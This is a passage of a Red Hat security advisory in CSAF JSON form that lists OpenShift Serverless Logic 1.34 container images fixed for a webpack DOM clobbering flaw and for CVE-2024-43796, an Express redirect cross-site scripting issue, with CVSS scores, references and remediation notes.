"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
